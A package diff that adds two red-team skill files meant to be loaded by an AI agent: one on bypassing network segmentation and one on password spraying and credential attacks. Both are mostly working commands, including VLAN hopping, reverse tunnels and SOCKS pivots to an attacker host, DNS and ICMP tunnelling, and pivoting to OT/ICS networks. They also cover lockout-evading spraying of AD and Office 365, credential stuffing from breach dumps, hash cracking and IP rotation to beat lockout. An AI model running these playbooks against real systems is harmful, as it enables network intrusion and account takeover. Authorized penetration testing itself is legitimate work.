rtexit-method 0.1.4 → 0.1.5

package/packaged-assets/.agents/skills/rt-network-segmentation/SKILL.md

@@ -0,0 +1,275 @@
+---
+name: rt-network-segmentation
+description: "Network segmentation bypass skill for authorized engagements. VLAN hopping (switch spoofing, double tagging), ACL evasion techniques, IPv6 bypass of IPv4-only controls, GRE/IPIP tunnel creation, SSH and SOCKS proxy chaining for pivoting, firewall rule evasion via fragmentation and protocol manipulation, and VXLAN/SDN exploitation. Use when testing network isolation controls or pivoting through segmented networks."
+---
+
+# rt-network-segmentation — Network Segmentation Bypass
+
+## Overview
+
+Network segmentation divides infrastructure into zones (DMZ, internal, OT/ICS, PCI). Bypassing segmentation allows an attacker to pivot from a low-trust zone (e.g., guest WiFi, DMZ web server) into high-trust zones (internal LAN, database tier, OT network).
+
+---
+
+## Phase 1 — Enumerate Network Segmentation
+
+```bash
+# From compromised host — map the network
+ip addr; ip route; ip neigh  # Local network info
+arp -a                        # ARP table — neighbors
+netstat -rn                   # Routing table
+
+# Find other network interfaces (multi-homed host = pivot opportunity)
+ifconfig -a
+ip link show
+
+# Discover accessible subnets
+for subnet in 10.0.0.0/8 172.16.0.0/12 192.168.0.0/16; do
+  nmap -sn $subnet --min-rate 5000 2>/dev/null | grep "report for"
+done
+
+# Test which firewall rules are in place
+# Try to reach internal targets from DMZ host
+for port in 22 80 443 3389 3306 1433 8080; do
+  timeout 1 bash -c "echo >/dev/tcp/INTERNAL_IP/$port" 2>/dev/null \
+    && echo "OPEN: $port" || echo "BLOCKED: $port"
+done
+```
+
+---
+
+## Phase 2 — VLAN Hopping
+
+### 2a — Switch Spoofing (DTP Negotiation)
+
+```bash
+# If switch port is in dynamic mode → negotiate trunk link
+# Attacker sends DTP (Dynamic Trunking Protocol) frames to become a trunk
+
+# Install Yersinia
+apt install yersinia -y
+
+# Negotiate 802.1Q trunk (GUI mode)
+yersinia -G
+# Select DTP → Enable Trunking
+
+# CLI mode
+yersinia dtp -attack 1  # Attack 1 = enable trunking
+
+# Once trunk negotiated → create VLAN subinterface
+modprobe 8021q
+vconfig add eth0 200  # Create VLAN 200 interface
+ip addr add 10.20.0.50/24 dev eth0.200
+ip link set eth0.200 up
+# Now can communicate with VLAN 200 hosts
+```
+
+### 2b — Double Tagging (One-Way)
+
+```bash
+# Exploit native VLAN misconfiguration
+# Outer tag = attacker's VLAN (native, stripped by first switch)
+# Inner tag = target VLAN (processed by second switch)
+# Limitation: one-way — responses can't return via same path
+
+# Create double-tagged packet
+pip3 install scapy
+
+python3 << 'EOF'
+from scapy.all import *
+
+# Double-tagged frame: outer=native VLAN(1), inner=target VLAN(200)
+packet = Ether(dst="ff:ff:ff:ff:ff:ff") / \
+         Dot1Q(vlan=1) / \    # Outer tag (native VLAN — gets stripped)
+         Dot1Q(vlan=200) / \  # Inner tag (target VLAN)
+         IP(dst="10.20.0.1") / \
+         ICMP()
+
+sendp(packet, iface="eth0")
+EOF
+```
+
+---
+
+## Phase 3 — IPv6 Bypass of IPv4-Only Controls
+
+```bash
+# Many firewall rules are IPv4-only
+# If IPv6 is enabled but uncontrolled → bypass firewall
+
+# Check if IPv6 is available
+ip -6 addr
+ping6 -c3 fe80::1
+
+# Discover IPv6 addresses of hosts
+nmap -6 --script ipv6-node-info fe80::%eth0/64
+# Or use neighbor discovery
+nmap -6 --script ipv6-neighbor -e eth0
+
+# Try to reach blocked host via IPv6 when IPv4 is blocked
+nmap -6 -sV -p 22,80,443 2001:db8::INTERNAL_IPv6
+curl -6 http://[2001:db8::1]/admin
+
+# Tunnel IPv4 over IPv6 if only IPv6 allowed outbound
+# 6in4 tunnel or use socat
+socat TCP-LISTEN:8080,fork TCP6:[IPv6_TARGET]:80
+```
+
+---
+
+## Phase 4 — Tunnel Creation for Pivoting
+
+### 4a — SSH Tunneling
+
+```bash
+# Local port forward: access INTERNAL:3306 via ATTACKER:3307
+ssh -L 3307:INTERNAL_DB:3306 compromised@PIVOT_HOST -N -f
+
+# Remote port forward: expose shell on internal host to attacker
+# Run on internal host (can't reach attacker directly):
+ssh -R 4444:127.0.0.1:22 attacker@ATTACKER_IP -N -f
+# Then on attacker: ssh -p 4444 user@localhost
+
+# SOCKS proxy: route all traffic through compromised host
+ssh -D 1080 compromised@PIVOT_HOST -N -f
+# Use with proxychains:
+echo "socks5 127.0.0.1 1080" >> /etc/proxychains4.conf
+proxychains4 nmap -sT INTERNAL_SUBNET
+
+# Multi-hop SSH tunnel (2 pivot hops)
+ssh -J compromised1@HOP1,compromised2@HOP2 target@FINAL_HOST
+```
+
+### 4b — Chisel (HTTP Tunneling — Bypasses Firewalls)
+
+```bash
+# Chisel tunnels TCP over HTTP/HTTPS — works through web proxies
+
+# On attacker
+./chisel server -p 8080 --reverse
+
+# On compromised host (outbound HTTP allowed)
+./chisel client ATTACKER_IP:8080 R:socks
+# Creates reverse SOCKS proxy on attacker port 1080
+
+# Use with proxychains
+proxychains4 crackmapexec smb INTERNAL_SUBNET
+
+# Forward specific ports
+./chisel client ATTACKER_IP:8080 R:3389:INTERNAL_HOST:3389
+# RDP to INTERNAL_HOST via ATTACKER_IP:3389
+```
+
+### 4c — Ligolo-ng (Layer 3 Tunnel)
+
+```bash
+# Ligolo-ng creates a full Layer 3 tunnel — most transparent
+# github.com/nicocha30/ligolo-ng
+
+# On attacker — start proxy
+./proxy -selfcert -laddr 0.0.0.0:443
+
+# On compromised host
+./agent -connect ATTACKER_IP:443 -ignore-cert
+
+# In ligolo proxy console:
+session  # select agent
+start    # start tunnel
+
+# Add route to internal network
+ip route add 10.10.10.0/24 dev ligolo
+
+# Now directly access internal network from attacker
+nmap 10.10.10.0/24
+```
+
+---
+
+## Phase 5 — Firewall Rule Evasion
+
+```bash
+# Fragmentation bypass (split packets to evade signature detection)
+nmap -f -sS TARGET_IP  # Fragment probes into 8-byte chunks
+nmap --mtu 16 TARGET_IP  # Custom MTU fragmentation
+
+# Source port bypass (if firewall allows traffic from DNS/HTTP src ports)
+nmap --source-port 53 -sU TARGET_IP  # Spoof source port 53 (DNS)
+nmap --source-port 80 -sS TARGET_IP  # Spoof source port 80 (HTTP)
+
+# Decoy scanning (hide real source among decoys)
+nmap -D RND:10 TARGET_IP  # 10 random decoys
+
+# Protocol manipulation (use allowed protocols as tunnels)
+# ICMP tunneling (if ICMP allowed but TCP blocked)
+ptunnel-ng -p PIVOT_HOST -lp 8080 -da INTERNAL_HOST -dp 22
+# Routes TCP over ICMP echo requests
+
+# DNS tunneling (if only DNS allowed outbound)
+iodine -f -P password dns.attacker.com
+# Routes IP traffic in DNS queries/responses
+```
+
+---
+
+## Phase 6 — GRE / IP-in-IP Tunnels
+
+```bash
+# If you control both endpoints and the network allows GRE (protocol 47)
+
+# Create GRE tunnel between two compromised hosts
+# On host A:
+ip tunnel add gre1 mode gre remote HOST_B_IP local HOST_A_IP
+ip addr add 172.30.0.1/30 dev gre1
+ip link set gre1 up
+
+# On host B:
+ip tunnel add gre1 mode gre remote HOST_A_IP local HOST_B_IP
+ip addr add 172.30.0.2/30 dev gre1
+ip link set gre1 up
+
+# Route VLAN traffic through GRE tunnel
+ip route add SEGMENTED_SUBNET via 172.30.0.2
+```
+
+---
+
+## Phase 7 — OT/ICS Network Reach
+
+```bash
+# Purdue model segmentation: Enterprise → DMZ → Control → Field
+# Common pivot path: IT network → historian server → OT VLAN
+
+# Identify historian/HMI hosts (often dual-homed)
+nmap -sV -p 102,502,4840,44818 HISTORIAN_IP
+# 102  = Siemens S7 (ISO-TSAP)
+# 502  = Modbus TCP
+# 4840 = OPC UA
+# 44818 = EtherNet/IP
+
+# If historian is compromised → it has routes to OT
+ip route  # Shows OT subnet routes
+# Access OT PLCs directly
+nmap -sT -p 102,502 OT_SUBNET
+```
+
+---
+
+## Skill Levels
+
+**BEGINNER:** SSH local port forward + SOCKS proxy + proxychains for basic pivoting
+
+**INTERMEDIATE:** Chisel/Ligolo-ng for HTTP-based tunneling + VLAN hopping detection + firewall rule enumeration
+
+**ADVANCED:** GRE tunnels + IPv6 bypass + ICMP/DNS tunneling through restrictive firewalls
+
+**EXPERT:** VLAN double-tagging attacks + OT network reach via historian pivot + SDN/VXLAN exploitation
+
+---
+
+## References
+
+- Chisel: https://github.com/jpillora/chisel
+- Ligolo-ng: https://github.com/nicocha30/ligolo-ng
+- Yersinia: https://github.com/tomac/yersinia
+- MITRE T1599: https://attack.mitre.org/techniques/T1599/
+- Network Pivoting: https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding

package/packaged-assets/.agents/skills/rt-password-spray/SKILL.md

@@ -0,0 +1,298 @@
+---
+name: rt-password-spray
+description: "Password spraying skill for authorized engagements. Anti-lockout spray logic, Active Directory spraying with kerbrute and CrackMapExec, O365/Azure AD spray, OWA/Exchange spray, VPN and portal spraying, distributed spraying to avoid lockout, credential stuffing from breach data, custom wordlist generation with CeWL and rules, and hashcat cracking workflows. Use when testing authentication controls across corporate services."
+---
+
+# rt-password-spray — Password Spraying & Credential Attacks
+
+## Overview
+
+Password spraying tests one or a few common passwords against many accounts — the inverse of brute force. It avoids account lockout by staying under the threshold (typically 3-5 attempts per account per window). In red team engagements, password spraying is often the fastest path to initial access.
+
+**Key principle:** 1-3 passwords × all accounts = high success rate, zero lockouts.
+
+---
+
+## Phase 1 — Pre-Spray Recon
+
+```bash
+# Find lockout policy BEFORE spraying
+# Method 1: From domain joined host
+net accounts /domain
+# Outputs: Lockout threshold, observation window, lockout duration
+
+# Method 2: Via LDAP (unauthenticated often works)
+ldapsearch -x -H ldap://DC_IP -b "DC=corp,DC=local" \
+  "(objectClass=domainPolicy)" lockoutThreshold lockoutObservationWindow
+
+# Method 3: From enum4linux
+enum4linux -P DC_IP | grep -i lockout
+
+# Safe spray rate: 1 attempt per account per (observation window + buffer)
+# If lockout = 5 attempts / 30 min window → spray 1 pass per 35 minutes max
+
+# Enumerate all valid usernames first
+kerbrute userenum --dc DC_IP -d corp.local /opt/SecLists/Usernames/Names/names.txt
+# Output: valid usernames only → build target list
+```
+
+---
+
+## Phase 2 — Password List Selection
+
+```bash
+# Universal first-pass passwords (highest success rate in enterprise)
+# Ordered by success frequency in red team engagements:
+Season+Year:     Summer2024! Spring2024! Winter2024! Fall2024!
+Company+Year:    Corp2024!  CorpIT2024! Company123!
+Welcome:         Welcome1! Welcome2024! Welcome@123
+Common:          Password1! P@ssw0rd! Admin123! Passw0rd1
+Months:          January2024! February2024!
+
+# Build spray list from company OSINT
+# CeWL — harvest words from company website
+cewl https://corp.com -d 3 -m 6 -w corp-words.txt
+cewl https://corp.com --with-numbers -w corp-words-nums.txt
+
+# Add password mutation rules
+hashcat --stdout corp-words.txt -r /usr/share/hashcat/rules/best64.rule \
+  | head -100 > spray-list.txt
+
+# Add season+year automatically
+python3 -c "
+import datetime
+year = datetime.datetime.now().year
+seasons = ['Spring','Summer','Fall','Winter']
+months = ['January','February','March','April','May','June',
+          'July','August','September','October','November','December']
+for s in seasons:
+    for y in [year-1, year]:
+        print(f'{s}{y}!')
+        print(f'{s}{y}@')
+for m in months:
+    print(f'{m}{year}!')
+" > seasonal-passwords.txt
+```
+
+---
+
+## Phase 3 — Active Directory Spraying
+
+### 3a — Kerbrute (Kerberos-based — No LDAP, Lower Noise)
+
+```bash
+# Download
+wget https://github.com/ropnop/kerbrute/releases/latest/download/kerbrute_linux_amd64 -O kerbrute
+chmod +x kerbrute
+
+# Single password spray
+./kerbrute passwordspray -d corp.local --dc DC_IP users.txt 'Summer2024!'
+
+# Multiple passwords (with delay between rounds)
+for pass in 'Summer2024!' 'Welcome1!' 'Password1!'; do
+  echo "[*] Spraying: $pass"
+  ./kerbrute passwordspray -d corp.local --dc DC_IP users.txt "$pass"
+  echo "[*] Sleeping 35 minutes..."
+  sleep 2100  # 35 min — safely under observation window
+done
+
+# Output: valid credentials listed as [+] VALID LOGIN
+```
+
+### 3b — CrackMapExec / NetExec (SMB Spray)
+
+```bash
+# SMB spray — tests against all DCs/hosts
+crackmapexec smb DC_IP -u users.txt -p 'Summer2024!' --no-bruteforce
+# --no-bruteforce: one password per user (not all combos)
+
+# Multiple passwords safely
+crackmapexec smb DC_IP -u users.txt -p passwords.txt --no-bruteforce --continue-on-success
+
+# Find which hosts the valid creds work on
+crackmapexec smb 10.10.10.0/24 -u validuser -p 'Summer2024!'
+
+# LDAP spray (quieter than SMB)
+crackmapexec ldap DC_IP -u users.txt -p 'Summer2024!' --no-bruteforce
+
+# WinRM spray (find remote management access)
+crackmapexec winrm 10.10.10.0/24 -u validuser -p 'Summer2024!'
+```
+
+---
+
+## Phase 4 — Cloud & Web Service Spraying
+
+### 4a — Microsoft 365 / Azure AD
+
+```bash
+# MSOLSpray — O365 spraying with lockout awareness
+git clone https://github.com/dafthack/MSOLSpray
+Import-Module .\MSOLSpray.ps1
+Invoke-MSOLSpray -UserList users.txt -Password 'Summer2024!'
+
+# Or: python version
+pip3 install msolspray
+msolspray -u users.txt -p 'Summer2024!' -d corp.com
+
+# TeamFiltration — Teams/O365 multi-vector
+git clone https://github.com/Flangvik/TeamFiltration
+./TeamFiltration --spray --out-dir results/ --userlist users.txt --password 'Summer2024!'
+
+# Check if SmartLockout is active (Azure AD)
+# SmartLockout = 10 failures → 60s lockout (per IP)
+# Bypass: distribute spray across multiple IPs / use slow spray
+```
+
+### 4b — OWA / Exchange Spraying
+
+```bash
+# MailSniper — Exchange/OWA spray
+Import-Module .\MailSniper.ps1
+Invoke-PasswordSprayOWA -ExchangeVersion Exchange2016 \
+  -ExchHostname mail.corp.com \
+  -UserList users.txt \
+  -Password 'Summer2024!' \
+  -OutFile sprayed.txt
+
+# EWSWrapper — slower, uses Exchange Web Services
+python3 ewsWrapper.py -u users.txt -p 'Summer2024!' -t mail.corp.com
+```
+
+### 4c — VPN & Remote Access Portals
+
+```bash
+# Cisco AnyConnect
+python3 vpn_spray.py --host vpn.corp.com --users users.txt --password 'Summer2024!'
+
+# Citrix NetScaler
+curl -s -X POST 'https://citrix.corp.com/nf/auth/doAuthentication.do' \
+  -d "login=USER&passwd=Summer2024!" | grep -i "success\|error\|invalid"
+
+# General HTTP form spray
+hydra -L users.txt -p 'Summer2024!' corp.com https-post-form \
+  "/login:username=^USER^&password=^PASS^:Invalid credentials" \
+  -t 1 -W 35  # 1 thread, 35 second wait between attempts
+
+# Web login spray with Burp Intruder
+# Positions: username (list) + password (fixed)
+# Grep match: success indicator
+# Throttle: 60s between requests per account
+```
+
+---
+
+## Phase 5 — Credential Stuffing (From Breach Data)
+
+```bash
+# Download breach data (authorized context only)
+# Sources: HaveIBeenPwned API, DeHashed, Snusbase
+
+# Check employees in breaches
+python3 breach_check.py --domain corp.com --output corp_breached.txt
+# Uses HIBP API: api.pwnedpasswords.com
+
+# Extract email:password pairs from breach dump
+grep -i "@corp.com" breach_dump.txt | awk -F: '{print $1":"$NF}' > corp_creds.txt
+
+# Test extracted credentials
+while IFS=: read -r user pass; do
+  ./kerbrute bruteuser -d corp.local --dc DC_IP "$pass" "$user"
+done < corp_creds.txt
+
+# Automated stuffing with Hydra
+hydra -C corp_creds.txt corp.com https-post-form \
+  "/login:email=^USER^&password=^PASS^:Invalid"
+```
+
+---
+
+## Phase 6 — Hash Cracking (Post-Capture)
+
+```bash
+# After capturing hashes (from Responder, secretsdump, LSASS dump)
+
+# NTLM hashes
+hashcat -a 0 -m 1000 ntlm_hashes.txt /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
+hashcat -a 0 -m 1000 ntlm_hashes.txt /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt \
+  -r /usr/share/hashcat/rules/best64.rule
+
+# NTLMv2 (from Responder)
+hashcat -a 0 -m 5600 ntlmv2_hashes.txt rockyou.txt
+
+# Kerberoast TGS hashes
+hashcat -a 0 -m 13100 kerberoast.hash rockyou.txt
+hashcat -a 0 -m 13100 kerberoast.hash rockyou.txt -r best64.rule
+
+# AS-REP roast
+hashcat -a 0 -m 18200 asrep.hash rockyou.txt
+
+# Custom rules for corporate passwords
+# Rule: capitalize first letter + append numbers + special char
+cat > corp_rules.rule << 'EOF'
+c $2 $0 $2 $4 $!
+c $2 $0 $2 $5 $!
+c $S $u $m $m $e $r $2 $0 $2 $4 $!
+^@ c
+$@ c
+c $1 $2 $3
+EOF
+hashcat -a 0 -m 1000 hashes.txt corp-words.txt -r corp_rules.rule
+
+# Mask attack (pattern-based)
+# Pattern: Capital + 6 lowercase + 2 digits + special
+hashcat -a 3 -m 1000 hashes.txt '?u?l?l?l?l?l?l?d?d?s'
+# Common corporate pattern: Company123!
+hashcat -a 3 -m 1000 hashes.txt 'Corp?d?d?d?d!'
+
+# AWS S3 / Azure SAS token cracking
+hashcat -a 0 -m 16500 jwt_tokens.txt wordlist.txt  # JWT HS256
+```
+
+---
+
+## Phase 7 — Distributed Spraying (Evade IP-based Lockout)
+
+```bash
+# Azure AD SmartLockout and many cloud services lock per-IP
+# Distribute spray across multiple egress IPs
+
+# Option A: Multiple VPS / proxychains
+# proxychains4 with multiple SOCKS proxies
+cat /etc/proxychains4.conf
+# [ProxyList]
+# socks5 IP1 1080
+# socks5 IP2 1080
+# socks5 IP3 1080
+
+proxychains4 ./kerbrute passwordspray -d corp.local --dc DC_IP users.txt 'Summer2024!'
+
+# Option B: AWS Lambda spray (GoLambda)
+git clone https://github.com/ustayready/fireprox
+python3 fire.py --access_key KEY --secret_access_key SECRET \
+  --region us-east-1 --command create --url https://login.microsoftonline.com
+
+# Each Lambda invocation = different IP
+```
+
+---
+
+## Skill Levels
+
+**BEGINNER:** kerbrute single password spray → find valid credentials → PTH or direct login
+
+**INTERMEDIATE:** Multi-round spray with lockout-aware delays + O365/OWA spray + CeWL wordlist generation
+
+**ADVANCED:** Distributed spray via proxychains + credential stuffing from breach data + custom hashcat rules
+
+**EXPERT:** Fully automated spray framework with per-account rate limiting + SmartLockout bypass + real-time credential validation
+
+---
+
+## References
+
+- kerbrute: https://github.com/ropnop/kerbrute
+- CrackMapExec: https://github.com/byt3bl33d3r/CrackMapExec
+- MSOLSpray: https://github.com/dafthack/MSOLSpray
+- MailSniper: https://github.com/dafthack/MailSniper
+- MITRE T1110.003: https://attack.mitre.org/techniques/T1110/003/